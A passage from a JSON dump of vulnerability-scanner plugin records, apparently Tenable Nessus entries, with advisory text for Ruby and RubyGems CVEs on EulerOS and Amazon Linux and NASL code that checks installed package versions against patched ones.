use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8324)** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.(CVE-2019-8325)An exploitable heap overflow vulnerability exists in the Fiddle::Function.new ''initialize'' function functionality of Ruby. In Fiddle::Function.new ''initialize'' heap buffer ''arg_types'' allocation is made based on args array length. 
Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)Type confusion exists in\n _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as ''retval'' argument can cause arbitrary code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-30T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : ruby (EulerOS-SA-2019-1617)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2016-2339", "CVE-2018-16395", "CVE-2018-16396", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "modified": "2021-07-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:rubygem-bigdecimal", "p-cpe:/a:huawei:euleros:rubygem-io-console", "p-cpe:/a:huawei:euleros:rubygem-json", "p-cpe:/a:huawei:euleros:rubygem-psych", "p-cpe:/a:huawei:euleros:rubygem-rdoc", "p-cpe:/a:huawei:euleros:rubygems", "cpe:/o:huawei:euleros:uvp:3.0.2.0"], "id": "EULEROS_SA-2019-1617.NASL", "href": "https://www.tenable.com/plugins/nessus/125569", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125569);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/06\");\n\n script_cve_id(\n \"CVE-2016-2337\",\n \"CVE-2016-2339\",\n \"CVE-2018-16395\",\n \"CVE-2018-16396\",\n \"CVE-2019-8322\",\n \"CVE-2019-8323\",\n \"CVE-2019-8324\",\n \"CVE-2019-8325\"\n );\n\n 
script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : ruby (EulerOS-SA-2019-1617)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - Ruby is an extensible, interpreted, object-oriented,\n scripting language. It has features to process text\n files and to perform system management tasks.Security\n Fix(es):An issue was discovered in the OpenSSL library\n in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before\n 2.5.2, and 2.6.x before 2.6.0-preview3. When two\n OpenSSL::X509::Name objects are compared using ==,\n depending on the ordering, non-equal objects may return\n true. When the first argument is one character longer\n than the second, or the second argument contains a\n character that is one less than a character in the same\n position of the first argument, the result of == will\n be true. This could be leveraged to create an\n illegitimate certificate that may be accepted as\n legitimate and then used in signing or encryption\n operations.(CVE-2018-16395)An issue was discovered in\n Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before\n 2.5.2, and 2.6.x before 2.6.0-preview3. It does not\n taint strings that result from unpacking tainted\n strings with some formats.(CVE-2018-16396)** RESERVED\n ** This candidate has been reserved by an organization\n or individual that will use it when announcing a new\n security problem. 
When the candidate has been\n publicized, the details for this candidate will be\n provided.(CVE-2019-8322)** RESERVED ** This candidate\n has been reserved by an organization or individual that\n will use it when announcing a new security problem.\n When the candidate has been publicized, the details for\n this candidate will be provided.(CVE-2019-8323)**\n RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-8324)** RESERVED ** This\n candidate has been reserved by an organization or\n individual that will use it when announcing a new\n security problem. When the candidate has been\n publicized, the details for this candidate will be\n provided.(CVE-2019-8325)An exploitable heap overflow\n vulnerability exists in the Fiddle::Function.new\n ''initialize'' function functionality of Ruby. In\n Fiddle::Function.new ''initialize'' heap buffer\n ''arg_types'' allocation is made based on args array\n length. Specially constructed object passed as element\n of args array can increase this array size after\n mentioned allocation and cause heap\n overflow.(CVE-2016-2339)Type confusion exists in\n _cancel_eval Ruby's TclTkIp class method. Attacker\n passing different type of object than String as\n ''retval'' argument can cause arbitrary code\n execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1617\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5681a400\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h13\",\n \"ruby-irb-2.0.0.648-33.h13\",\n \"ruby-libs-2.0.0.648-33.h13\",\n \"rubygem-bigdecimal-1.2.0-33.h13\",\n \"rubygem-io-console-0.4.2-33.h13\",\n \"rubygem-json-1.7.7-33.h13\",\n \"rubygem-psych-2.0.0-33.h13\",\n \"rubygem-rdoc-4.0.0-33.h13\",\n \"rubygems-2.0.14.1-33.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-18T14:14:17", "description": "RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900 , which allowed redirection to an arbitrary gem server in any security domain.", "cvss3": {}, "published": "2015-06-18T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ruby20 (ALAS-2015-547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ruby20", "p-cpe:/a:amazon:linux:ruby20-debuginfo", "p-cpe:/a:amazon:linux:ruby20-devel", "p-cpe:/a:amazon:linux:ruby20-doc", "p-cpe:/a:amazon:linux:ruby20-irb", "p-cpe:/a:amazon:linux:ruby20-libs", "p-cpe:/a:amazon:linux:rubygem20-bigdecimal", "p-cpe:/a:amazon:linux:rubygem20-io-console", "p-cpe:/a:amazon:linux:rubygem20-psych", "p-cpe:/a:amazon:linux:rubygems20", "p-cpe:/a:amazon:linux:rubygems20-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-547.NASL", "href": "https://www.tenable.com/plugins/nessus/84248", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-547.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84248);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\");\n script_xref(name:\"ALAS\", value:\"2015-547\");\n\n script_name(english:\"Amazon Linux AMI : ruby20 (ALAS-2015-547)\");\n script_summary(english:\"Checks rpm 
output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not\nvalidate the hostname returned in the SRV record before sending\nrequests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for\nCVE-2015-3900 , which allowed redirection to an arbitrary gem server\nin any security domain.\"\n );\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3dfa3e8c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-547.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby20' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-bigdecimal\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems20-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-debuginfo-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-devel-2.0.0.645-1.27.amzn1\")) 
flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-doc-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-irb-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-libs-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-bigdecimal-1.2.0-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-io-console-0.4.2-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-psych-2.0.0-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems20-2.0.14-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems20-devel-2.0.14-1.27.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby20 / ruby20-debuginfo / ruby20-devel / ruby20-doc / ruby20-irb / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:26", "description": "RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900 , which allowed redirection to an arbitrary gem server in any security domain.", "cvss3": {}, "published": "2015-06-18T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ruby22 (ALAS-2015-549)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ruby22", "p-cpe:/a:amazon:linux:ruby22-debuginfo", "p-cpe:/a:amazon:linux:ruby22-devel", "p-cpe:/a:amazon:linux:ruby22-doc", "p-cpe:/a:amazon:linux:ruby22-irb", "p-cpe:/a:amazon:linux:ruby22-libs", "p-cpe:/a:amazon:linux:rubygem22-bigdecimal", "p-cpe:/a:amazon:linux:rubygem22-io-console", "p-cpe:/a:amazon:linux:rubygem22-psych", "p-cpe:/a:amazon:linux:rubygems22", "p-cpe:/a:amazon:linux:rubygems22-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-549.NASL", "href": "https://www.tenable.com/plugins/nessus/84250", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-549.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84250);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\");\n script_xref(name:\"ALAS\", value:\"2015-549\");\n\n script_name(english:\"Amazon Linux AMI : ruby22 (ALAS-2015-549)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the 
original requested domain. RubyGems did not\nvalidate the hostname returned in the SRV record before sending\nrequests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for\nCVE-2015-3900 , which allowed redirection to an arbitrary gem server\nin any security domain.\"\n );\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3dfa3e8c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-549.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby22' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-debuginfo-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-devel-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-doc-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-irb-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-libs-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-bigdecimal-1.2.6-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-io-console-0.4.3-1.6.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"rubygem22-psych-2.0.8-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-2.4.5-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-devel-2.4.5-1.6.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby22 / ruby22-debuginfo / ruby22-devel / ruby22-doc / ruby22-irb / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:02", "description": "RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. 
(CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900 , which allowed redirection to an arbitrary gem server in any security domain.", "cvss3": {}, "published": "2015-06-18T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ruby21 (ALAS-2015-548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ruby21", "p-cpe:/a:amazon:linux:ruby21-debuginfo", "p-cpe:/a:amazon:linux:ruby21-devel", "p-cpe:/a:amazon:linux:ruby21-doc", "p-cpe:/a:amazon:linux:ruby21-irb", "p-cpe:/a:amazon:linux:ruby21-libs", "p-cpe:/a:amazon:linux:rubygem21-bigdecimal", "p-cpe:/a:amazon:linux:rubygem21-io-console", "p-cpe:/a:amazon:linux:rubygem21-psych", "p-cpe:/a:amazon:linux:rubygems21", "p-cpe:/a:amazon:linux:rubygems21-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-548.NASL", "href": "https://www.tenable.com/plugins/nessus/84249", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-548.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84249);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\");\n script_xref(name:\"ALAS\", value:\"2015-548\");\n\n script_name(english:\"Amazon Linux AMI : ruby21 (ALAS-2015-548)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the 
original requested domain. RubyGems did not\nvalidate the hostname returned in the SRV record before sending\nrequests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for\nCVE-2015-3900 , which allowed redirection to an arbitrary gem server\nin any security domain.\"\n );\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3dfa3e8c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-548.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby21' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems21-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n 
